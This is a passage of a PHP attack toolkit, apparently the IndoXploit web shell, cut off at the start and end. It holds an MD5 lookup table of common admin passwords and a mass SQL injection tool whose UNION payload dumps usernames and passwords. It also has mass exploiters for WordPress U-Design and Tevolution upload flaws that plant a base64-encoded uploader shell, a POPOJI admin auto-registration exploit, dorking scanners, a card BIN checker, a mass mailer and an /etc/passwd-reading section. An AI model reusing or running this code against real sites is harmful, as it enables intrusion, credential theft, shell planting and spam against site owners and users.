1578. "fbff29af096fa646757ce8439b644714" => "vro190588",
1579. "1feadc10e93f2b64c65868132f1e72d3" => "agoes",
1580. "0192023a7bbd73250516f069df18b500" => "admin123",
1581. "7aa1dfee8619ac8f282e296d83eb55ff" => "meong",
1582. "24fa5ee2c1285e115dd6b5fe1c25a333" => "773062",
1583. "d557fd4686821b5d8b927cdfe6e67d21" => "#admin#",
1584. "5fec4ba8376f207d1ff2f0cac0882b01" => "admin!@#",
1585. "a01726b559eeeb5fc287bf0098a22f6c" => "@dm1n",
1586. "73acd9a5972130b75066c82595a1fae3" => "ADMIN",
1587. "511f2efed0e465e700a951f2f1ecec19" => "bs1unt46",
1588. "7b7bc2512ee1fedcd76bdc68926d4f7b" => "Administrator",
1589. "99fedb09f0f5da90e577784e5f9fdc23" => "ADMINISTRATOR",
1590. "e58bfd635502ea963e1d52487ac2edfa" => "!@#123!@#123",
1591. "5449ccea16d1cc73990727cd835e45b5" => "ngadimin",
1592. "c21f969b5f03d33d43e04f8f136e7682" => "default",
1593. "1a1dc91c907325c69271ddf0c944bc72" => "pass",
1594. "fffdf0489f264598e9d35cba0381e9ac" => "sukmapts",
1595. "5f4dcc3b5aa765d61d8327deb882cf99" => "password",
1596. "5ebe2294ecd0e0f08eab7690d2a6ee69" => "secret",
1597. "c893bad68927b457dbed39460e6afd62" => "prueba",
1598. "b2ca9cfa6067282a031d28a54886822d" => "admin4343",
1599. "3a3795bb61d5377545b4f345ff223e3d" => "bingo",
1600. "e172dd95f4feb21412a692e73929961e" => "bismillah",
1601. "8221303fbf816fd9da96be7dd4c92f99" => "salawarhandap123",
1602. "0570e3795fbe97ddd3ce53be141d1aed" => "indoxploit",
1603. "098f6bcd4621d373cade4e832627b4f6" => "test",
1604. "976adc43eaf39b180d9f2c624a1712cd" => "adminppcp",
1605. "5985609a2dc01098797c94a43e0a1115" => "masarief",
1606. "21232f297a57a5a743894a0e4a801fc3" => "admin",
1607. "1870a829d9bc69abf500eca6f00241fe" => "wordpress",
1608. "126ac9f6149081eb0e97c2e939eaad52" => "blog",
1609. "fe01ce2a7fbac8fafaed7c982a04e229" => "demo",
1610. "04e484000489dd3b3fb25f9aa65305c6" => "redaksi2016",
1611. "91f5167c34c400758115c2a6826ec2e3" => "administrador",
1612. "200ceb26807d6bf99fd6f4f0d1ca54d4" => "administrator",
1613. "c93ccd78b2076528346216b3b2f701e6" => "admin1234",
1614. "912ec803b2ce49e4a541068d495ab570" => "asdf",
1615. "1adbb3178591fd5bb0c248518f39bf6d" => "asdf1234",
1616. "e99a18c428cb38d5f260853678922e03" => "abc123",
1617. "a152e841783914146e4bcd4f39100686" => "asdfgh",
1618. "a384b6463fc216a5f8ecb6670f86456a" => "qwert",
1619. "d8578edf8458ce06fbc5bb76a58c5ca4" => "qwerty",
1620. "b59c67bf196a4758191e42f76670ceba" => "1111",
1621. "96e79218965eb72c92a549dd5a330112" => "111111",
1622. "4297f44b13955235245b2497399d7a93" => "123123",
1623. "c33367701511b4f6020ec61ded352059" => "654321",
1624. "81dc9bdb52d04dc20036dbd8313ed055" => "1234",
1625. "e10adc3949ba59abbe56e057f20f883e" => "123456",
1626. "fcea920f7412b5da7be0cf42b8c93759" => "1234567",
1627. "25d55ad283aa400af464c76d713c07ad" => "12345678",
1628. "25f9e794323b453885f5181f1b624d0b" => "123456789",
1629. "e807f1fcf82d132f9bb018ca6738a19f" => "1234567890",
1630. "befe9f8a14346e3e52c762f333395796" => "qawsed",
1631. "76419c58730d9f35de7ac538c2fd6737" => "qazwsx",
1632. "5f4dcc3b5aa765d61d8327deb882cf99" => "password",
1633. "bed128365216c019988915ed3add75fb" => "passw0rd",
1634. "21232f297a57a5a743894a0e4a801fc3" => "admin",
1635. "e10adc3949ba59abbe56e057f20f883e" => "123456",
1636. "5f4dcc3b5aa765d61d8327deb882cf99" => "password",
1637. "25d55ad283aa400af464c76d713c07ad" => "12345678",
1638. "f379eaf3c831b04de153469d1bec345e" => "666666",
1639. "96e79218965eb72c92a549dd5a330112" => "111111",
1640. "fcea920f7412b5da7be0cf42b8c93759" => "1234567",
1641. "d8578edf8458ce06fbc5bb76a58c5ca4" => "qwerty",
1642. "6f3cac6213ffceee27cc85414f458caa" => "siteadmin",
1643. "200ceb26807d6bf99fd6f4f0d1ca54d4" => "administrator",
1644. "63a9f0ea7bb98050796b649e85481845" => "root",
1645. "4297f44b13955235245b2497399d7a93" => "123123",
1646. "c8837b23ff8aaa8a2dde915473ce0991" => "123321",
1647. "e807f1fcf82d132f9bb018ca6738a19f" => "1234567890",
1648. "4ca7c5c27c2314eecc71f67501abb724" => "letmein123",
1649. "cc03e747a6afbbcbf8be7668acfebee5" => "test123",
1650. "62cc2d8b4bf2d8728120d052163a77df" => "demo123",
1651. "32250170a0dca92d53ec9624f336ca24" => "pass123",
1652. "46f94c8de14fb36680850768ff1b7f2a" => "123qwe",
1653. "200820e3227815ed1756a6b531e7e0d2" => "qwe123",
1654. "c33367701511b4f6020ec61ded352059" => "654321",
1655. "f74a10e1d6b2f32a47b8bcb53dac5345" => "loveyou",
1656. "172eee54aa664e9dd0536b063796e54e" => "adminadmin123",
1657. "e924e336dcc4126334c852eb8fadd334" => "waskita1234",
1658. "02631cc1d0cc5bda188566e90d0ae16c" => "rsamku2013",
1659. "b69cbef044eac6fc514a2988e62c5b30" => "unlock08804",
1660. "12e110a1b89da9b09a191f1f9b0a1398" => "nalaratih",
1661. "f70d32432ff0a8984b5aadeb159f9db6" => "Much240316",
1662. "a2fffa77aa0dde8cd4c416b5114eba21" => "gondola",
1663. "2b45af95ce316ea4cffd2ce4093a2b83" => "w4nd3szaki",
1664. "c5612a125d8613ddae79a6b36c8bee37" => "Reddevil#21",
1665. "6e7fbe8e6147e2c430ce7e8ab883e533" => "R4nd0m?!",
1666. "5136850b6c8f3ebc66122188347efda0" => "adminku",
1667. "5214905fbe8d7f0bb0d0a328f08af3f0" => "adminpust4k4",
1668. "acfc976c2d22e4a595a9ee6fc0d05f27" => "dikmen2016",
1669. "dcdee606657b5f7d8b218badfeb22a90" => "masputradmin",
1670. "ecb4208ee41389259a632d3a733c2786" => "741908",
1671. "827ccb0eea8a706c4c34a16891f84e7b" => "12345",
1672. "855be097acdf2fea4e342615a154ca3c" => "tolol",
1673. "eeee80342778e7b497d507f89094b10d" => "master10",
1674. "d29c0398602e6cf005f0dcb7a0443c7d" => "adminjalan",
1675. "9062756924cf10763cc89cf2793a77ab" => "pass4@nd1",
1676. "8b6bc5d8046c8466359d3ac43ce362ab" => "ganteng",
1677. "528d06a172eb2d8fab4e93f33f3986a8" => "jasindolive",
1678. "058fe7f85df1e992ef7bf948f1db7842" => "404J",
1679. "abe1f4492f922a9111317ed7f7f8e723" => "bantarjati5",
1680. );
1681. $sites = explode("\r\n", htmlspecialchars($_POST['target']));
1682. if(isset($_POST['go'])) {
1683. foreach($sites as $url) {
1684. if(!preg_match("/^http:\/\//", $url) AND !preg_match("/^https:\/\//", $url)) {
1685. $url = "http://$url";
1686. } else {
1687. $url = $url;
1688. }
1689. $statis = "";
1690. $sisa = "";
1691. $login = "";
1692. $param_list = array("statis","kategori","berita");
1693. $curl = ngcurl($url);
1694. $curl = str_replace("'", '"', $curl);
1695. foreach($param_list as $param) {
1696. preg_match_all("/$param-(.*?)\">/", $curl, $id);
1697. foreach($id[1] as $stat) {
1698. $pecah = explode("-", $stat);
1699. $statis .= $pecah[0];
1700. $sisa .= $pecah[1];
1701. break;
1702. }
1703. foreach($admin as $adminweb) {
1704. $curl_admin = ngcurl("$url/$adminweb");
1705. if(preg_match("/administrator|username|password/i", $curl_admin) AND !preg_match("/not found|forbidden|404|403|500/i", $curl_admin)) {
1706. $login .= "$url/$adminweb";
1707. break;
1708. }
1709. }
1710. $sql = ngcurl("$url/$param-$statis'/*!50000UniON*/+/*!50000SeLeCT*/+/*!50000cOnCAt*/(0x696e646f78706c6f6974,0x3c6c693e,username,0x20,password,0x3c6c693e)+from+users--+---+-$sisa");
1711. preg_match("/<meta name=\"description\" content=\"(.*?)\">/", $sql, $up);
1712. preg_match("/<li>(.*)<li>/", $up[1], $akun);
1713. $data = explode(" ", $akun[1]);
1714. echo "<center>[+] URL: $url\n<center>";
1715. //echo "[+] param: $param\n";
1716. if(htmlspecialchars($curl) !== htmlspecialchars($sql)) {
1717. if(preg_match("/indoxploit/", $sql)) {
1718. //echo "[ Injection Successfully ]\n";
1719. if($data[0] == "" || $data[1] == "") {
1720. echo "[+] Not Injected :(\n\n";
1721. break;
1722. } else {
1723. echo "[+] username: ".$data[0]."\n";
1724. $passwd = $real_pass[$data[1]];
1725. if($passwd == "") {
1726. $passwd = $data[1];
1727. simpen($data[1]);
1728. }
1729. echo "[+] password: $passwd\n";
1730. }
1731. if($login == "") {
1732. echo "[+] Login Admin ga ketemu :(\n\n";
1733. } else {
1734. echo "[+] Login: $login\n\n";
1735. }
1736. break;
1737. } else {
1738. echo "<center>[+] Not Injected :(\n\n</center>";
1739. break;
1740. }
1741. } else {
1742. echo "<center>[+] Not Injected :(\n\n</center>";
1743. break;
1744. }
1745. }
1746. }
1747. }
1748. }elseif($_GET['do'] == 'u-design_exploit'){
1749. echo '
1750. <html>
1751. <center>
1752. <h1>WordPress U-Design Themes Mass Xploiter</h1>
1753. <form method="post" enctype="multipart/form-data">
1754. Shellname: <br><input type="text" name="filename" style="width: 500px;" height="10" value="indoxploit.php" required><br>
1755. Target: <br><textarea name="url" style="width: 500px; height: 200px;" placeholder="http://www.target.com/"></textarea><br>
1756. <input type="submit" name="exp" value="Hajar!" style="width: 500px;">
1757. </form>';
1758. set_time_limit(0);
1759. error_reporting(0);
1760.  
1761. function buffer() {
1762. ob_flush();
1763. flush();
1764. }
1765. function curl($url, $payload) {
1766. $ch = curl_init();
1767. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
1768. curl_setopt($ch, CURLOPT_URL, $url);
1769. curl_setopt($ch, CURLOPT_POST, true);
1770. curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
1771. curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
1772. curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
1773. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1774. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
1775. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
1776. curl_setopt($ch, CURLOPT_HEADER, 0);
1777. curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
1778. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
1779. $res = curl_exec($ch);
1780. curl_close($ch);
1781. return $res;
1782. }
1783. function cek($url) {
1784. $ch = curl_init();
1785. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
1786. curl_setopt($ch, CURLOPT_URL, $url);
1787. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
1788. $res = curl_exec($ch);
1789. curl_close($ch);
1790. return $res;
1791. }
1792. $file = htmlspecialchars($_POST['filename']);
1793. $site = explode("\r\n", $_POST['url']);
1794. $do = $_POST['exp'];
1795. $uploader = base64_decode("PD9waHANCmVjaG8gIkluZG9YcGxvaXQgLSBBdXRvIFhwbG9pdGVyIFUtRGVzaWduIjsNCmVjaG8gIjxicj4iLnBocF91bmFtZSgpLiI8YnI+IjsNCmVjaG8gIjxmb3JtIG1ldGhvZD0ncG9zdCcgZW5jdHlwZT0nbXVsdGlwYXJ0L2Zvcm0tZGF0YSc+DQo8aW5wdXQgdHlwZT0nZmlsZScgbmFtZT0naWR4Jz48aW5wdXQgdHlwZT0nc3VibWl0JyBuYW1lPSd1cGxvYWQnIHZhbHVlPSd1cGxvYWQnPg0KPC9mb3JtPiI7DQppZigkX1BPU1RbJ3VwbG9hZCddKSB7DQoJaWYoQGNvcHkoJF9GSUxFU1snaWR4J11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2lkeCddWyduYW1lJ10pKSB7DQoJZWNobyAic3Vrc2VzIjsNCgl9IGVsc2Ugew0KCWVjaG8gImdhZ2FsIjsNCgl9DQp9DQo/Pg==");
1796. if($do) {
1797. $idx_dir = mkdir("indoxploit_tools", 0755);
1798. $shell = "indoxploit_tools/".$file;
1799. $fopen = fopen($shell, "w");
1800. fwrite($fopen, $uploader);
1801. fclose($fopen);
1802. foreach($site as $url) {
1803. $target = $url.'/wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php';
1804. $data = array(
1805. "Filedata" => "@$shell"
1806. );
1807. $curl = curl($target, $data);
1808. if($curl) {
1809. $cek = cek($url.'/'.$file);
1810. if(preg_match("/IndoXploit/i", $cek)) {
1811. echo "<a href='$url/$file' target='_blank'>$url/$file</a> -> shellmu<br>";
1812. }
1813. }
1814. buffer();
1815. }
1816. }
1817. }elseif($_GET['do'] == 'u-design_dorker'){
1818. echo '
1819. <html>
1820. <form method="post">
1821. <center>
1822. <h1>WordPress U-Design Theme Mass Xploiter</h1>
1823. Dork: <input type="text" name="dork" placeholder="inurl:/wp-content/themes/u-design" size="50" height="10">
1824. <input type="submit" value="scan">
1825. </center>
1826. </form>
1827. </html>';
1828. class indoxploit {
1829. public $dork;
1830. public function google($dork, $page) {
1831. $kunAPI = "AIzaSyDYG1FME1N7meBZLcywY7VojMHmtUAUIzY";
1832. $dork = urlencode($dork);
1833. $url = "http://ajax.googleapis.com/ajax/services/search/web?v=1.0&hl=iw&rsz=8&q={$dork}&key=$kunAPI&start={$page}";
1834. $output = json_decode($this->http_getx($url, true), true);
1835. if($output) {
1836. return $output;
1837. } else {
1838. return false;
1839. }
1840. }
1841. public function http_getx($url, $safemode = false) {
1842. if($safemode === true) sleep(1);
1843. $im = curl_init($url);
1844. curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
1845. curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
1846. curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
1847. curl_setopt($im, CURLOPT_HEADER, 0);
1848. return curl_exec($im);
1849. curl_close();
1850. }
1851. public function buffer() {
1852. ob_flush();
1853. flush();
1854. }
1855.  
1856. }
1857. $dorker = new indoxploit;
1858. $dork = $dorker->dork = $_POST['dork'];
1859. if(isset($dork)) {
1860. $data = $dorker->google($dork, "0");
1861. $dorker->buffer();
1862. if($data) {
1863. foreach($data['responseData']['cursor']['pages'] as $key => $data_page) {
1864. $data = $dorker->google($dork, $data_page['start']);
1865. foreach($data['responseData']['results'] as $key => $load_data) {
1866. if($_SESSION[$load_data['visibleUrl']]) {
1867. } else {
1868. $_SESSION[$load_data['visibleUrl']] = "1";
1869. $url = "http://".$load_data['visibleUrl']."/";
1870. echo $url."<br>";
1871. $dorker->buffer();
1872. }
1873. }
1874. }
1875. $dorker->buffer();
1876. } else {
1877. echo "google captcha.";
1878. }
1879. }
1880. }else if($_GET['do']=="binchecker"){
1881. echo '
1882. <style>
1883. #form{
1884. color:white;
1885. }
1886. #area{
1887. background-color:white;
1888. width:50%;
1889. margin-left:25%;
1890. }
1891. </style>
1892. <div id="form">
1893. <form action="" method="post">
1894. <p align="center">-= BIN CHECKER =-</p>
1895. <section id="area">
1896. <textarea style="margin: 0px;
1897. height: 129px;
1898. background-color: transparent;
1899. color: red;
1900. align:center;
1901. border: none;" name="binlist" placeholder="BIN CODE"></textarea><br>
1902. </section><br>
1903. <center><input type="submit" name="shcbincheck" value="Check Bin"></center>
1904. </form><pre>';
1905. if($_POST['shcbincheck']){
1906. echo "<hr>";
1907. function singl3_j3mbut($j3m8u7){
1908. $amb1l_j3mbut = file_get_contents("http://www.binlist.net/json/$j3m8u7");
1909. $dec0d3_j3mbut = json_decode($amb1l_j3mbut,TRUE);
1910. return $dec0d3_j3mbut;
1911. }
1912. $x = explode("\r\n", $_POST['binlist']);
1913. foreach ($x as $key => $value) {
1914. $dec0d3_j3mbut = singl3_j3mbut($value);
1915. if($dec0d3_j3mbut['bin']){
1916. echo "
1917. BIN INFO : <font color=red>".$dec0d3_j3mbut['bin']."</font>|
1918. <font color=yellow>".$dec0d3_j3mbut['bank']."</font>|
1919. <font color=blue>".$dec0d3_j3mbut['brand']."</font>|
1920. <font color=red>".$dec0d3_j3mbut['card_type']."</font>|
1921. <font color=green>".$dec0d3_j3mbut['country_name']."</font><br>";
1922. }
1923. }
1924. }echo'
1925. </pre>
1926. </div>';
1927. }elseif($_GET['do'] == 'popoji_add_admin'){
1928. echo '
1929. <html>
1930. <head>
1931. <title>POPOJI CMS Add Admin Auto Registration</title>
1932. <meta name="author" content="IndoXploit">
1933. <style type="text/css">
1934. html {
1935. margin: 20px auto;
1936. color: #ffffff;
1937. }
1938. header {
1939. color: lime;
1940. font-size: 35px;
1941. margin: 10px auto;
1942. text-align: center;
1943. text-decoration: underline;
1944. }
1945. input[type=text] {
1946. border: 1px solid #008000;
1947. color: #7FFFFF;
1948. width: 500px;
1949. height: 20px;
1950. padding-left: 5px;
1951. margin: 5px auto;
1952. background: transparent;
1953. }
1954. input[type=submit] {
1955. border: 1px solid #008000;
1956. color: #7FFFFF;
1957. background: transparent;
1958. width: 500px;
1959. }
1960. textarea {
1961. background: transparent;
1962. color: #7FFFFF;
1963. border: 1px solid #008000;
1964. resize: none;
1965. width: 500px;
1966. height: 250px;
1967. padding-left: 5px;
1968. margin: 5px auto;
1969. }
1970. a {
1971. text-decoration: none;
1972. color: lime;
1973. }
1974. a:hover {
1975. text-decoration: underline;
1976. }
1977. </style>
1978. </head>';
1979. set_time_limit(0);
1980. error_reporting(0);
1981.  
1982. function dav($url, $post=null) {
1983. $ch = curl_init();
1984. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
1985. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
1986. curl_setopt($ch, CURLOPT_URL, $url);
1987. if($post != null) {
1988. curl_setopt($ch, CURLOPT_POST, true);
1989. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
1990. }
1991. curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
1992. curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
1993. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1994. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
1995. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
1996. curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HHTP_USER_AGENT']);
1997. curl_setopt($ch, CURLOPT_HEADER, 0);
1998. return curl_exec($ch);
1999. curl_close($ch);
2000. }
2001.  
2002. $sites = explode("\r\n", $_POST['url']);
2003. $user = "indoxploit";
2004. $pass = $user;
2005. $email = htmlspecialchars($_POST['email']);
2006. if($_POST['hajar']) {
2007. echo "<span style='font-size: 25px; text-decoration: underline; color: lime; margin-bottom: 20px;'>Result Gannnnn</span><p>";
2008. if(!filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
2009. foreach($sites as $url) {
2010. if(!preg_match("/^http:\/\//", $url) AND !preg_match("/^https:\/\//", $url)) {
2011. $url = "http://".$url;
2012. } else {
2013. $url = $url;
2014. }
2015. echo "[+] Nyecan -> $url<br>";
2016. $post_register = array(
2017. "username" => $user,
2018. "email" => $email,
2019. "password" => $pass,
2020. "re-password" => $pass,
2021. );
2022. $register = dav("$url/po-admin/actregister.php", $post_register);
2023. echo "[+] Register ";
2024. if(!preg_match("/404|headers already sent|disabled for security reasons|Please type another email!/", $register) AND preg_match("/SUCCESS!!!|>Check your email for next step. Thank you!/", $register)) {
2025. echo "<font color=lime>OK!</font><br>";
2026. echo "[+] <font color=gold>Cek emailmu buat aktivasi</font><br>";
2027. echo "[+] u/p: <font color=lime>$user</font><br><br>";
2028. $post_login = array(
2029. "username" => $user,
2030. "password" => $pass,
2031. );
2032. } else {
2033. echo "<font color=red>Gagal!</font><br><br>";
2034. }
2035. }
2036. } else {
2037. echo "<font color=red>Emailmu ga valid bosss, email harus valid biar bisa masuk token registrasinyaa.</font>";
2038. }
2039. } else {
2040. echo '
2041. <center>
2042. <header>POPOJI Auto Registration</header>
2043. <form method="post">
2044. Email: <br>
2045. <input type="text" name="email" placeholder="email@asu.com" required><br>
2046. Domains: <br>
2047. <textarea name="url" placeholder="http://www.target.com"></textarea><br>
2048. <input type="submit" name="hajar" value="Xploit!">
2049. </form>
2050. </center>';
2051. }
2052. }elseif($_GET['do'] == 'tevolution'){
2053. echo '
2054. <html>
2055. <center>
2056. <h1><strong>Tevolution Mass Upload Shell</strong></h1>
2057. <form method="post" enctype="multipart/form-data">
2058. Shellname: <br><input type="text" name="filename" style="width: 500px;" height="10" value="indoxploit.php.xxxjpg" required><br>
2059. Target: <br><textarea name="url" style="width: 500px; height: 200px;" placeholder="http://www.target.com/"></textarea><br>
2060. <input type="submit" name="exp" value="Hajar!" style="width: 500px;">
2061. </form>';
2062. set_time_limit(0);
2063. error_reporting(0);
2064.  
2065. function buffer() {
2066. ob_flush();
2067. flush();
2068. }
2069. function curl($url, $payload) {
2070. $ch = curl_init();
2071. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
2072. curl_setopt($ch, CURLOPT_URL, $url);
2073. curl_setopt($ch, CURLOPT_POST, true);
2074. curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
2075. curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
2076. curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
2077. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
2078. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
2079. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
2080. curl_setopt($ch, CURLOPT_HEADER, 0);
2081. curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
2082. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
2083. $res = curl_exec($ch);
2084. curl_close($ch);
2085. return $res;
2086. }
2087. $file = htmlspecialchars($_POST['filename']);
2088. $site = explode("\r\n", $_POST['url']);
2089. $do = $_POST['exp'];
2090. $uploader = base64_decode("PD9waHANCmVjaG8gIkluZG9YcGxvaXQgLSBBdXRvIFhwbG9pdGVyIjsNCmVjaG8gIjxicj4iLnBocF91bmFtZSgpLiI8YnI+IjsNCmVjaG8gIjxmb3JtIG1ldGhvZD0ncG9zdCcgZW5jdHlwZT0nbXVsdGlwYXJ0L2Zvcm0tZGF0YSc+DQo8aW5wdXQgdHlwZT0nZmlsZScgbmFtZT0naWR4Jz48aW5wdXQgdHlwZT0nc3VibWl0JyBuYW1lPSd1cGxvYWQnIHZhbHVlPSd1cGxvYWQnPg0KPC9mb3JtPiI7DQppZigkX1BPU1RbJ3VwbG9hZCddKSB7DQoJaWYoQGNvcHkoJF9GSUxFU1snaWR4J11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2lkeCddWyduYW1lJ10pKSB7DQoJZWNobyAic3Vrc2VzIjsNCgl9IGVsc2Ugew0KCWVjaG8gImdhZ2FsIjsNCgl9DQp9DQo/Pg==");
2091. if($do) {
2092. $y = date("Y");
2093. $m = date("m");
2094. $idx_dir = mkdir("indoxploit_tools", 0755);
2095. $shell = "indoxploit_tools/".$file;
2096. $fopen = fopen($shell, "w");
2097. fwrite($fopen, $uploader);
2098. fclose($fopen);
2099. foreach($site as $url) {
2100. $target = $url.'/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php';
2101. $cek_shell = "$url/wp-content/uploads/$y/$m/$file";
2102. $data = array(
2103. "Filedata" => "@$shell"
2104. );
2105. $curl = curl($target, $data);
2106. if($curl) {
2107. $cek = file_get_contents($cek_shell);
2108. if(preg_match("/IndoXploit - Auto Xploiter/is", $cek)) {
2109. echo "<a href='$cek_shell' target='_blank'>$cek_shell</a> -> shellmu<br>";
2110. }
2111. }
2112. buffer();
2113. }
2114. }
2115. }elseif($_GET['do'] == 'sqli_scanner'){
2116. function cover() {
2117. print "<center>";
2118. print " ****** SQL Scanner via Bing Dorker ******<br><br>";
2119. print " ***** Coded by l0c4lh34rtz - IndoXploit *****<br><br>";
2120. print " **** Sanjungan Jiwa - Jancok Sec - Res7ock Crew ****<br><br>";
2121. print "</center>";
2122. }
2123. cover();
2124. echo '<center>
2125. <form method="post" action="">
2126. Dork: <input type="text" name="dork" placeholder=\'"page.php?id=1" site:it\' style="width: 300px; height: 25px;">
2127. <input type="submit" value=">>" name="submit">
2128. </form>
2129. </center>';
2130. $dork = htmlspecialchars($_POST['dork']);
2131. $do = urlencode($dork);
2132. if(isset($_POST['submit'])) {
2133. $npage = 1;
2134. $npages = 30000;
2135. $allLinks = array();
2136. $lll = array();
2137. while($npage <= $npages) {
2138. $x = getsource("http://www.bing.com/search?q=".$do."&first=".$npage);
2139. if($x) {
2140. preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
2141. foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
2142. $npage = $npage + 10;
2143. if (preg_match("(first=" . $npage . "&amp)siU", $x, $linksuiv) == 0) break;
2144. } else break;
2145. }
2146. foreach($allLinks as $url) {
2147. $urls = parse_url($url, PHP_URL_HOST);
2148. $urls = "http://$urls/";
2149. if($_SESSION[$urls]) {
2150. //
2151. } else {
2152. $_SESSION[$urls] = "1";
2153. if(inject($url)) {
2154. echo " $url -> Vuln!!<br>";
2155. simpen($url);
2156. }
2157. }
2158. }
2159. }
2160. $error[] = 'You have an error in your SQL';
2161. $error[] = 'supplied argument is not a valid MySQL result resource in';
2162. $error[] = 'Division by zero in';
2163. $error[] = 'Call to a member function';
2164. $error[] = 'Microsoft JET Database';
2165. $error[] = 'ODBC Microsoft Access Driver';
2166. $error[] = 'Microsoft OLE DB Provider for SQL Server';
2167. $error[] = 'Unclosed quotation mark';
2168. $error[] = 'Microsoft OLE DB Provider for Oracle';
2169. $error[] = 'Incorrect syntax near';
2170. $error[] = 'SQL query failed';
2171. $error[] = 'Warning: filesize()';
2172. $error[] = 'Warning: preg_match()';
2173. $error[] = 'Warning: array_merge()';
2174. $error[] = 'Warning: mysql_query()';
2175. $error[] = 'Warning: mysql_num_rows()';
2176. $error[] = 'Warning: session_start()';
2177. $error[] = 'Warning: getimagesize()';
2178. $error[] = 'Warning: mysql_fetch_array()';
2179. $error[] = 'Warning: mysql_fetch_assoc()';
2180. $error[] = 'Warning: is_writable()';
2181. $error[] = 'Warning: Unknown()';
2182. $error[] = 'Warning: mysql_result()';
2183. $error[] = 'Warning: pg_exec()';
2184. $error[] = 'Warning: require()';
2185.  
2186. function getsource($url) {
2187. $curl = curl_init($url);
2188. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
2189. $content = curl_exec($curl);
2190. curl_close($curl);
2191. return $content;
2192. }
2193. function inject($url) {
2194. $data = getsource(str_replace("=", "='", $url));
2195. $errors = implode("|", $GLOBALS['error']);
2196. return preg_match("#{$errors}#i", $data);
2197. }
2198. function simpen($isi) {
2199. $f = fopen("result_sql.txt","a+");
2200. fwrite($f, "$isi<br>");
2201. fclose($f);
2202. }
2203. }elseif($_GET['do'] == 'mass_mail'){
2204. if(isset($_POST['send'])){ $email = $_POST['email'];$subject = $_POST['subject'];$from = $_POST['fromEmail'];$message = $_POST['message'];if($email&&$subject&&$from&&$message){$emails = explode(";", $email);foreach($emails as $email){mail($email, $subject, $message, "From: ".$from); }}}
2205. echo '
2206. <center><strong>Mass Mailer</strong></center>
2207. <center><p>Selamat Menggunakan Ndan ^_^</p></center>
2208. <form action="" method="post">
2209. <table align="center">
2210. <tr>
2211. <td>To Email(s) : &nbsp;</td>
2212. <td><input type="text" style="background-color:#010101;color:#7FFFFF;border:1px solid #7FFFFF;outline:none;font-size:11px;border-radius:3px;-moz-border-radius:3px;-webkit-border-radius:3px;padding:2px 3px;margin:0 0 0 -1px; width:220px;" name="email" placeholder="email@address.com" />
2213. </tr>
2214. <tr>
2215. <td>Subject : &nbsp;</td>
2216. <td>
2217. <input type="text" style="background-color:#010101;color:#7FFFFF;border:1px solid #7FFFFF;outline:none;font-size:11px;border-radius:3px;-moz-border-radius:3px;-webkit-border-radius:3px;padding:2px 3px;margin:0 0 0 -1px;width:220px" name="subject" />
2218. </td>
2219. </tr>
2220. <tr><td>From Email : &nbsp;</td><td><input type="email" style="background-color:#010101;color:#7FFFFF;border:1px solid #7FFFFF;outline:none;font-size:11px;border-radius:3px;-moz-border-radius:3px;-webkit-border-radius:3px;padding:2px 3px;margin:0 0 0 -1px;width:220px;" name="fromEmail" placeholder="example@google.com" /></td>
2221. </tr>
2222. <tr><td>Message : &nbsp;</td><td></td></tr>
2223. </table>
2224. <table align="center">
2225. <tr><td>
2226. <textarea style="background-color:#010101;color:#7FFFFF;border:1px solid #7FFFFF;outline:none;font-size:11px;border-radius:3px;-moz-border-radius:3px;-webkit-border-radius:3px;padding:2px 3px;margin:0 0 0 -1px; height:200px;width:290px;" name="message"></textarea>
2227. </td></tr>
2228. <tr><td><input type="submit" name="send" value="Send Message(s)" /></td></tr>
2229. </table>
2230. </form>';
2231. }elseif($_GET['do'] == 'etcpler'){
2232. echo "<center>Bypass etc/passw With:<br>
2233. <table style='width:50%' align='center'>
2234. <tr>
2235. <td><form method='post'><input type='submit' value='System Function' name='syst'></form></td>
2236. <td><form method='post'><input type='submit' value='Passthru Function' name='passth'></form></td>
2237. <td><form method='post'><input type='submit' value='Exec Function' name='ex'></form></td>
2238. <td><form method='post'><input type='submit' value='Shell_exec Function' name='shex'></form></td>
2239. <td><form method='post'><input type='submit' value='Posix_getpwuid Function' name='melex'></form></td>
2240. </tr></table><center>Bypass User With : <table style='width:50%' align='center'>
2241. <tr>
2242. <td><form method='post'><input type='submit' value='Awk Program' name='awkuser'></form></td>
